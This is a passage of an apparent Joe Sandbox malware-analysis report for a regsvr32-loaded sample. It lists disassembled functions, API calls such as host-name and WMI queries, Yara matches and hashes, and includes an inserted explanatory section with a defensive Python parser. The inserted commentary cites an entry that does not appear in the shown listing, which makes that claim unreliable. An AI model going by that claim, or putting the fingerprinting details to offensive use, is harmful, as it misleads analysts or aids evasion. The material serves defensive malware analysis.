                                                                    • Part of subcall function 04F87718: __NMSG_WRITE.LIBCMT ref: 04F87738
                                                                  • std::exception::exception.LIBCMT ref: 04F877FB
                                                                  • std::exception::exception.LIBCMT ref: 04F87815
                                                                  • __CxxThrowException@8.LIBCMT ref: 04F87826
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                  • String ID:
                                                                  • API String ID: 2388904642-0
                                                                  • Opcode ID: 7f9ff3607203f8d0e7b58d90a7652ecaa2e8b9615d42c5d69c1e353cf8a40a72
                                                                  • Instruction ID: 67d724c52a2dd726edd0c52d7851401769686e7bc1dd0dad9ea00c3dc962efaf
                                                                  • Opcode Fuzzy Hash: 7f9ff3607203f8d0e7b58d90a7652ecaa2e8b9615d42c5d69c1e353cf8a40a72
                                                                  • Instruction Fuzzy Hash: F6F0A931D042099AEB00FBA4DC41BDD7BE66B41758F34402DD9149F1D0DBB4B692C759
                                                                  APIs
                                                                    • Part of subcall function 02631420: HeapFree.KERNEL32(?,00000000,?,?,?,026340A1,?,00000000,02634029,?,02645054,02633628), ref: 0263143D
                                                                    • Part of subcall function 02631420: _free.LIBCMT ref: 02631459
                                                                  • HeapDestroy.KERNEL32(00000000), ref: 02636663
                                                                  • HeapCreate.KERNEL32(?,?,?), ref: 02636675
                                                                  • _free.LIBCMT ref: 02636685
                                                                  • HeapDestroy.KERNEL32 ref: 026366B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Destroy_free$CreateFree
                                                                  • String ID:
                                                                  • API String ID: 4097506873-0
                                                                  • Opcode ID: 89903acfe8d60dbdf1ff097c077709da85dc6d7b2ef77b1390ffee2e0cc6bdfb
                                                                  • Instruction ID: ae68c7f415545898738dd0329e46378331227cfb090cefa5b8cbf70f8cb4d641
                                                                  • Opcode Fuzzy Hash: 89903acfe8d60dbdf1ff097c077709da85dc6d7b2ef77b1390ffee2e0cc6bdfb
                                                                  • Instruction Fuzzy Hash: 6CF014B9500702ABD7219F25E808B57B7F8FF84B54F20491CE89A83240DB34F8518B94
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                  • String ID:
                                                                  • API String ID: 865245655-0
                                                                  • Opcode ID: 4a06915e8936009563f3bcb273f9b9dd16386e252301183da01dac539c0c6632
                                                                  • Instruction ID: f07d7f95051e5cc967d7981532627e911251b174b1105efb7b9a0ff495fdddf5
                                                                  • Opcode Fuzzy Hash: 4a06915e8936009563f3bcb273f9b9dd16386e252301183da01dac539c0c6632
                                                                  • Instruction Fuzzy Hash: 46F05BB4900645EFD708BFB1CD08DAE7FE9AF88248720C45CE9058F222DA75F9439B95
                                                                  APIs
                                                                  • GetComputerNameExW.KERNEL32(00000005,00000000,00000000,?,?,6C864F0D), ref: 6C87C228
                                                                  • GetComputerNameExW.KERNEL32(00000005,00000002,00000000,00000005,00000000,00000000,?,?,6C864F0D), ref: 6C87C296
                                                                    • Part of subcall function 6C89A6B0: GetLastError.KERNEL32(?,6C86131E,6C8577BC,?,6C8577BC,?,?,?,?,6C851F14,?), ref: 6C89A6B3
                                                                    • Part of subcall function 6C85AC40: HeapFree.KERNEL32(00000000,0000000C), ref: 6C8E9FA8
                                                                  Strings
                                                                  • CurrentBuildNumberCurrentMajorVersionNumber (), xrefs: 6C87C3E7
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ComputerName$ErrorFreeHeapLast
                                                                  • String ID: CurrentBuildNumberCurrentMajorVersionNumber ()
                                                                  • API String ID: 1552939727-3310863298
                                                                  • Opcode ID: b2b56d593e16f7e418504dd8e7f9da269626866aa52b22932c9807f6a529721d
                                                                  • Instruction ID: 5187f26fd12130d783d72d3056eefa6657e3939aecb945af3b15afa39e1fef96
                                                                  • Opcode Fuzzy Hash: b2b56d593e16f7e418504dd8e7f9da269626866aa52b22932c9807f6a529721d
                                                                  • Instruction Fuzzy Hash: 4051D271D002099BEB30AEE99D85BEF76B8AF1530CF144939D914A7A82F774C94887B1
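The entries above all follow the report's per-function listing format: an APIs block (direct calls, with nested "Part of subcall function" lines), an optional Strings block, the Memory Dump Source the function was lifted from, and a Similarity block whose Opcode ID hashes the opcode sequence and whose Instruction ID also covers operands. Read that way, the __cftoe_l/__cftof_l/__cftog_l function listed twice above with the same Opcode ID (4bdea013…) but different Instruction IDs is the same function body found in two dumps, once in the 04F80000 region (with a Yara match) and once in the 02631000 region. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses this listing format, groups entries by Opcode ID to surface exactly such cross-dump duplicates, and collects the directly called API names (here the GetComputerNameExW host-fingerprinting call) for triage. The sample text is constructed from entries on this page; the function and field names are the example's own.

```python
"""Parse Joe Sandbox per-function listing entries (APIs / Strings / Memory Dump
Source / Similarity blocks) and group them by Opcode ID to spot the same function
body surfacing in more than one memory dump.  Added example, not Joe Sandbox code."""
import re
from collections import defaultdict

# Section headers exactly as they appear in the report listing.
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity"}

# "Name.MODULE(args), ref: ADDR"; args and the comma before "ref:" are optional,
# nested subcalls are prefixed with "Part of subcall function ADDR: ".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>.+?)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(
    r"^Source File: (?P<file>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), "
    r"based on PE: (?P<pe>true|false)$")


def parse_entries(text):
    """Return one dict per function entry; an entry starts at each 'APIs' header."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            if section == "APIs":
                cur = {"apis": [], "strings": [], "dumps": [], "yara": False}
                entries.append(cur)
            elif section == "Yara matches" and cur is not None:
                cur["yara"] = True  # header is only present when a rule matched
            continue
        if cur is None or not line.startswith("•"):
            continue
        item = line.lstrip("• ").strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                cur["apis"].append(m.groupdict())
        elif section == "Strings":
            value, _, xrefs = item.rpartition(", xrefs: ")
            cur["strings"].append({"value": value, "xrefs": xrefs.split()})
        elif section == "Memory Dump Source":
            m = SOURCE_RE.match(item)
            if m:
                cur["dumps"].append(m.groupdict())
        elif section == "Similarity":
            key, _, value = item.partition(":")
            cur[key.strip()] = value.strip()
    return entries


def shared_opcode_ids(entries):
    """Opcode ID -> sorted dump offsets, for IDs seen at more than one offset.
    Opcode ID covers the opcode sequence but not operands, so one ID at two
    offsets with different Instruction IDs is the same function body relocated."""
    seen = defaultdict(set)
    for e in entries:
        oid = e.get("Opcode ID")
        if oid:
            seen[oid].update(d["offset"] for d in e["dumps"])
    return {oid: sorted(offs) for oid, offs in seen.items() if len(offs) > 1}


def direct_api_names(entries):
    """Deduplicated names of APIs called directly (subcall lines excluded)."""
    return sorted({a["name"] for e in entries for a in e["apis"] if not a["sub"]})


# Constructed sample: three entries taken from this report's listing.
SAMPLE = """
APIs
Memory Dump Source
• Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
Yara matches
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
• Instruction ID: 158e06f604da39282f6583820bdd484f33028747e187cb05c89b6616bfe7e8bb
APIs
Memory Dump Source
• Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
• Instruction ID: 3e55a16c715ef2e61582b37800e6019264206480185364ff1b609aa777d2d3f5
APIs
• GetComputerNameExW.KERNEL32(00000005,00000000,00000000,?,?,6C864F0D), ref: 6C87C228
  • Part of subcall function 6C89A6B0: GetLastError.KERNEL32(?,6C86131E,6C8577BC,?,6C8577BC,?,?,?,?,6C851F14,?), ref: 6C89A6B3
Strings
• CurrentBuildNumberCurrentMajorVersionNumber (), xrefs: 6C87C3E7
Memory Dump Source
• Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
Similarity
• API ID: ComputerName$ErrorFreeHeapLast
• Opcode ID: b2b56d593e16f7e418504dd8e7f9da269626866aa52b22932c9807f6a529721d
"""

if __name__ == "__main__":
    found = parse_entries(SAMPLE)
    for oid, offsets in shared_opcode_ids(found).items():
        print(f"{oid[:16]}... present at offsets {', '.join(offsets)}")
    print("direct APIs:", ", ".join(direct_api_names(found)))
```

Feeding the full listing through parse_entries and then shared_opcode_ids gives the set of function bodies that exist both in the RWX 04F80000 region and elsewhere, which is a quick way to tell unpacked-and-relocated code from code that only ever lived in one mapping; direct_api_names over the 6C850000 entries (the PE-backed DLL) pulls out the fingerprinting calls worth a detection rule.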
                                                                  APIs
                                                                  • SysAllocString.OLEAUT32(root\WMI), ref: 6C861C1E
                                                                    • Part of subcall function 6C892680: SysFreeString.OLEAUT32(8904C483), ref: 6C89268D
                                                                  • SysFreeString.OLEAUT32(6C861554), ref: 6C861CA0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: String$Free$Alloc
                                                                  • String ID: root\WMI
                                                                  • API String ID: 986138563-2712063579
                                                                  • Opcode ID: 82175d924a187a5091170fa10e222aebb22d768b1091c272fc6aa989f5fe68c4
                                                                  • Instruction ID: 81ff864b9f7888c0315ac99dac8fbc7ec8421e01326f1cb09be1dffd8c226031
                                                                  • Opcode Fuzzy Hash: 82175d924a187a5091170fa10e222aebb22d768b1091c272fc6aa989f5fe68c4
                                                                  • Instruction Fuzzy Hash: EB316EB1C0160E9BDF11DFA9D948BDFB7B8BF08308F104925E415B7A01E735AA48CBA1
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID: %p not found?!?!
                                                                  • API String ID: 1294909896-11085004
                                                                  • Opcode ID: 9e7e12e0f9a67fcc3d3a4064e0478d9c330838a51ce50980fe78e9b630303881
                                                                  • Instruction ID: aeb1051f3905045794ca1c21335f7f9657efaba0926a6e0008d2709893d6dc7a
                                                                  • Opcode Fuzzy Hash: 9e7e12e0f9a67fcc3d3a4064e0478d9c330838a51ce50980fe78e9b630303881
                                                                  • Instruction Fuzzy Hash: 29117CB1608301CFDB44AF6D98C125AB7E8BB29648B15C82FD5C4CBF00DB70D6448B96
                                                                  APIs
                                                                  • __output_l.LIBCMT ref: 04F878BA
                                                                    • Part of subcall function 04F879A2: __getptd_noexit.LIBCMT ref: 04F879A2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __getptd_noexit__output_l
                                                                  • String ID: B
                                                                  • API String ID: 2141734944-1255198513
                                                                  • Opcode ID: c8983595ceaa5ba76f605141cca68a1d372402d04fa407bee202103836b82639
                                                                  • Instruction ID: 2d7768cf1dc99b55d3227218752d6ead3c40f8b12d4e11422beb40dfd74e861a
                                                                  • Opcode Fuzzy Hash: c8983595ceaa5ba76f605141cca68a1d372402d04fa407bee202103836b82639
                                                                  • Instruction Fuzzy Hash: A3016171D0420D9BEF10BFA4CC01BEEBBF8FB44364F200119E924AA280D774A502DBA5
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CallFrame@12Setting__getptd
                                                                  • String ID: j
                                                                  • API String ID: 3454690891-2137352139
                                                                  • Opcode ID: f348396704fc7f8bac78ebcdf07e9e8cb48e9860e181cb268830054982e1df9c
                                                                  • Instruction ID: f23f812d7ed20f414e911f1e44ec6b23a8a5149305c66173dfabaeae698a1f71
                                                                  • Opcode Fuzzy Hash: f348396704fc7f8bac78ebcdf07e9e8cb48e9860e181cb268830054982e1df9c
                                                                  • Instruction Fuzzy Hash: 90118C31D09255DEEF11DF68C944398BBB0BB05328F18828AD8A92F1E2C3756953CB81
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CallFrame@12Setting__getptd
                                                                  • String ID: j
                                                                  • API String ID: 3454690891-2137352139
                                                                  • Opcode ID: 2d5c79073739351d5b3842c6d6c1ec2e7c65ba24b1d71476762812d21029c0e0
                                                                  • Instruction ID: 463acc34c8e8acef44c4000ee34976f2a3f40cb41fb72ae0429eec7d6067a5e9
                                                                  • Opcode Fuzzy Hash: 2d5c79073739351d5b3842c6d6c1ec2e7c65ba24b1d71476762812d21029c0e0
                                                                  • Instruction Fuzzy Hash: CC11A0319092909ECB12DF68C5843ACBB70BF01728FA842C9D4E42B6D3CB755962CF95
                                                                  APIs
                                                                  • memcpy.MSVCRT(?,000000B5,?), ref: 6C8BC165
                                                                  • memcpy.MSVCRT(?,00000003,00000002), ref: 6C8BC17B
                                                                  • memcpy.MSVCRT(?,000000B5,?), ref: 6C8BC355
                                                                  • memcpy.MSVCRT(?,00000003,00000002), ref: 6C8BC36B
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID:
                                                                  • API String ID: 3510742995-0
                                                                  • Opcode ID: ae03a2a3a508a887f1228bac063574b12fe276091cd23d25991ee57077c1d43a
                                                                  • Instruction ID: e9259124ce64e5046368ee88d5149d5f27af3b123b88346bfeff818e9ed151c4
                                                                  • Opcode Fuzzy Hash: ae03a2a3a508a887f1228bac063574b12fe276091cd23d25991ee57077c1d43a
                                                                  • Instruction Fuzzy Hash: A6C1B175D016099FCB10CF98C880AEEBBB1FF99308F14466ED9087B352E7719916CB90
                                                                  APIs
                                                                  • fprintf.MSVCRT ref: 6C94837B
                                                                    • Part of subcall function 6C947D40: TlsAlloc.KERNEL32(?,?,6C94832C), ref: 6C947D43
                                                                  Strings
                                                                  • Error cleaning up spin_keys for thread , xrefs: 6C948306
                                                                  • once %p is %d, xrefs: 6C948370
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Allocfprintf
                                                                  • String ID: once %p is %d$Error cleaning up spin_keys for thread
                                                                  • API String ID: 386651473-1049478869
                                                                  • Opcode ID: eff5c31608cdad04c12fa67f2a142b9b958436bc80c40077a415babd40584a39
                                                                  • Instruction ID: 22149ed2fdd3eedf29d9016870da45659cc817c2319dff96fe3b5615389c3633
                                                                  • Opcode Fuzzy Hash: eff5c31608cdad04c12fa67f2a142b9b958436bc80c40077a415babd40584a39
                                                                  • Instruction Fuzzy Hash: 73F03C722083008AD700BF69994525EBAE9AF62248F11C82ED48487B11EB74C2488B97
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 04F93E7D
                                                                    • Part of subcall function 04F8A108: __getptd_noexit.LIBCMT ref: 04F8A10B
                                                                    • Part of subcall function 04F8A108: __amsg_exit.LIBCMT ref: 04F8A118
                                                                  • __getptd.LIBCMT ref: 04F93E8B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                  • String ID: csm
                                                                  • API String ID: 803148776-1018135373
                                                                  • Opcode ID: b6df51cf0bd50e8a3f4545857898d45d6830f72e6c8bdfca11c47be0234717bf
                                                                  • Instruction ID: 07c878cde64929a0ff8d92ec45e43882339806a47266621beafb02f0bf84cdb0
                                                                  • Opcode Fuzzy Hash: b6df51cf0bd50e8a3f4545857898d45d6830f72e6c8bdfca11c47be0234717bf
                                                                  • Instruction Fuzzy Hash: 33014B34C006068BFF36EF21D8406ADB7F5EF08215F54442ED8425A650CB72AD9BCF41
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 026437A8
                                                                    • Part of subcall function 02639A33: __getptd_noexit.LIBCMT ref: 02639A36
                                                                    • Part of subcall function 02639A33: __amsg_exit.LIBCMT ref: 02639A43
                                                                  • __getptd.LIBCMT ref: 026437B6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                  • String ID: csm
                                                                  • API String ID: 803148776-1018135373
                                                                  • Opcode ID: 232d83957bbd0d82e1ddc03cfa156672e8b489190560304b81aebacbb872713b
                                                                  • Instruction ID: fecbc4fe1f3a24d7a7ccc8a96ade3cbd0eb457cc1a1834671c09275fb5821a57
                                                                  • Opcode Fuzzy Hash: 232d83957bbd0d82e1ddc03cfa156672e8b489190560304b81aebacbb872713b
                                                                  • Instruction Fuzzy Hash: 92014B348026058FCF34AF66C480AAEBBB6AF01315F7544AED4C156760CF71E5A1CF55
                                                                  APIs
                                                                  • TlsGetValue.KERNEL32(6C869313,00000001,6C869314,?,?,?,6C89E52E,6C954010,00000000,?,6C8A41BB,00000001,?,6C8664F7), ref: 6C8A08A2
                                                                  • TlsGetValue.KERNEL32(00000000,?,00000000,6C8664F7,?,?,?,?,?,?,?,00000000,?,00000000,?,6C869314), ref: 6C8A08EC
                                                                  • TlsSetValue.KERNEL32(00000000,00000000,00000000,?,00000000,6C8664F7,?,?,?,?,?,?,?,00000000,?,00000000), ref: 6C8A08F8
                                                                  • TlsGetValue.KERNEL32(00000000,6C8664F7,?,?,?,?,?,?,?,00000000,?,00000000,?,6C869314,?,?), ref: 6C8A0925
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID:
                                                                  • API String ID: 3702945584-0
                                                                  • Opcode ID: 18d017b907ea839a4aca6ecd6d596253b9820f573ce2a86fd05372a13865d549
                                                                  • Instruction ID: dfadd056078c1c78d19757aa0d6318372334406b925d5e47a620948dd3226ee5
                                                                  • Opcode Fuzzy Hash: 18d017b907ea839a4aca6ecd6d596253b9820f573ce2a86fd05372a13865d549
                                                                  • Instruction Fuzzy Hash: 0C416B71E412149FF7304B988D40BAB7778EF81B18F180825EA159BB81DB71EC0286E9
                                                                  APIs
                                                                  • memcpy.MSVCRT(00000000,?,000000E8), ref: 6C85E029
                                                                  • memmove.MSVCRT(?,00000000,000000E8), ref: 6C85E03A
                                                                  • memcpy.MSVCRT(?,00000001,000000E8), ref: 6C85E07C
                                                                  • memcpy.MSVCRT(?,?,000000EC), ref: 6C85E0CB
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$memmove
                                                                  • String ID:
                                                                  • API String ID: 1283327689-0
                                                                  • Opcode ID: bd9360b5ec95aa760c4ed2cc51bd7d3424e0bf53b0f17b6bfa8dedf76d68300f
                                                                  • Instruction ID: 195c3cb52136f26fcd239bf68f090e68426934c349c6768845df247b834b4123
                                                                  • Opcode Fuzzy Hash: bd9360b5ec95aa760c4ed2cc51bd7d3424e0bf53b0f17b6bfa8dedf76d68300f
                                                                  • Instruction Fuzzy Hash: 12514931A0421A8BDB11CF68CC417EAB7B4BF55308F08867AEC54FB782E775D9598790
                                                                  APIs
                                                                  • TlsGetValue.KERNEL32(?,6C95405C,?,5252E850,66000000,?,6C89F1B0,6C95405C,00000000,?,6C89F02D,00000000,?), ref: 6C8A0766
                                                                  • TlsGetValue.KERNEL32(00000000,?,?,00000000,6C89F02D,00000000,?,?,?,?,?,?,6C89E128,66000000,?), ref: 6C8A07BF
                                                                  • TlsSetValue.KERNEL32(00000000,00000000,00000000,?,?,00000000,6C89F02D,00000000,?,?,?,?,?,?,6C89E128,66000000), ref: 6C8A07CB
                                                                  • TlsGetValue.KERNEL32(00000000,6C89F02D,00000000,?,?,?,?,?,?,6C89E128,66000000,?,?,6C89E65D,?,?), ref: 6C8A0821
                                                                  Memory Dump Source
